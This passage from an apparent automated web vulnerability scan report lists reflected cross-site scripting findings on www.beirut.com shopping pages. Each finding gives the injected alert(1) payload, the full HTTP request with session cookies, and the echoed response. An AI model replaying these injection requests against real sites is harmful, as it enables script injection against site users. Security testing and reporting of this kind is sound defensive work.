<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping8e97f'-alert(1)-'9e3197d8b3e/Clothing-Accessories/194367784/Hair-Wigs/73';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.818. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hair-Wigs/73 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Hair-Wigs/73

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8b92'-alert(1)-'a5a25c7e335 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessoriesd8b92'-alert(1)-'a5a25c7e335/194367784/Hair-Wigs/73 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:16:52 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55528

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Clothing-Accessoriesd8b92'-alert(1)-'a5a25c7e335/194367784/Hair-Wigs/73';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.819. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hair-Wigs/73 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Hair-Wigs/73

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9663e<script>alert(1)</script>bcca74b079b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Clothing-Accessories9663e<script>alert(1)</script>bcca74b079b/194367784/Hair-Wigs/73 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:17:11 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55504

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Clothing Accessories9663e<script>alert(1)</script>bcca74b079b <a href="#" id="backlink">
...[SNIP]...

4.820. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hair-Wigs/73 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Hair-Wigs/73

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce379'-alert(1)-'2fd43d9f88b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/194367784ce379'-alert(1)-'2fd43d9f88b/Hair-Wigs/73 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:25:49 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Clothing-Accessories/194367784ce379'-alert(1)-'2fd43d9f88b/Hair-Wigs/73';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.821. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hair-Wigs/73 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Hair-Wigs/73

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2bf5'-alert(1)-'1ade1d40b1b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/194367784/Hair-Wigsb2bf5'-alert(1)-'1ade1d40b1b/73 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:36:36 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55485

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Clothing-Accessories/194367784/Hair-Wigsb2bf5'-alert(1)-'1ade1d40b1b/73';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.822. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hair-Wigs/73 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Hair-Wigs/73

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74b7c'-alert(1)-'bd3a9de6948 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/194367784/Hair-Wigs/7374b7c'-alert(1)-'bd3a9de6948 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:45:45 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Clothing-Accessories/194367784/Hair-Wigs/7374b7c'-alert(1)-'bd3a9de6948';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.823. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hats/56 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Hats/56

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9edbf"><a>45613fea63f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping9edbf"><a>45613fea63f/Clothing-Accessories/194367784/Hats/56 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:11:49 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59592

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping9edbf"><a>45613fea63f">
...[SNIP]...

4.824. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hats/56 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Hats/56

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88d2b'-alert(1)-'ccf15a8868f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping88d2b'-alert(1)-'ccf15a8868f/Clothing-Accessories/194367784/Hats/56 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:22:50 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping88d2b'-alert(1)-'ccf15a8868f/Clothing-Accessories/194367784/Hats/56';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.825. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hats/56 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Hats/56

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ceec0'-alert(1)-'cd4395f2887 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessoriesceec0'-alert(1)-'cd4395f2887/194367784/Hats/56 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:30:19 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Clothing-Accessoriesceec0'-alert(1)-'cd4395f2887/194367784/Hats/56';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.826. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hats/56 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Hats/56

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d9583<script>alert(1)</script>c8095bff225 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Clothing-Accessoriesd9583<script>alert(1)</script>c8095bff225/194367784/Hats/56 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:30:48 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60640

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Clothing Accessoriesd9583<script>alert(1)</script>c8095bff225 <a href="#" id="backlink">
...[SNIP]...

4.827. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hats/56 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Hats/56

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ffcbd'-alert(1)-'88666a01ca5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/194367784ffcbd'-alert(1)-'88666a01ca5/Hats/56 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:38:06 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Clothing-Accessories/194367784ffcbd'-alert(1)-'88666a01ca5/Hats/56';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.828. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hats/56 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Hats/56

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5513'-alert(1)-'9dfda8414f2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/194367784/Hatsb5513'-alert(1)-'9dfda8414f2/56 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:49:52 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Clothing-Accessories/194367784/Hatsb5513'-alert(1)-'9dfda8414f2/56';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.829. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hats/56 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Hats/56

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 493a4'-alert(1)-'0257898faf5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/194367784/Hats/56493a4'-alert(1)-'0257898faf5 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:53:36 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55302

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Clothing-Accessories/194367784/Hats/56493a4'-alert(1)-'0257898faf5';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.830. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Jewelry/23 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Jewelry/23

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3edbc'-alert(1)-'89c35d638a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping3edbc'-alert(1)-'89c35d638a0/Clothing-Accessories/194367784/Jewelry/23 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:16:35 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping3edbc'-alert(1)-'89c35d638a0/Clothing-Accessories/194367784/Jewelry/23';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.831. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Jewelry/23 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Jewelry/23

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4bb7"><a>d9b30da8cf1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

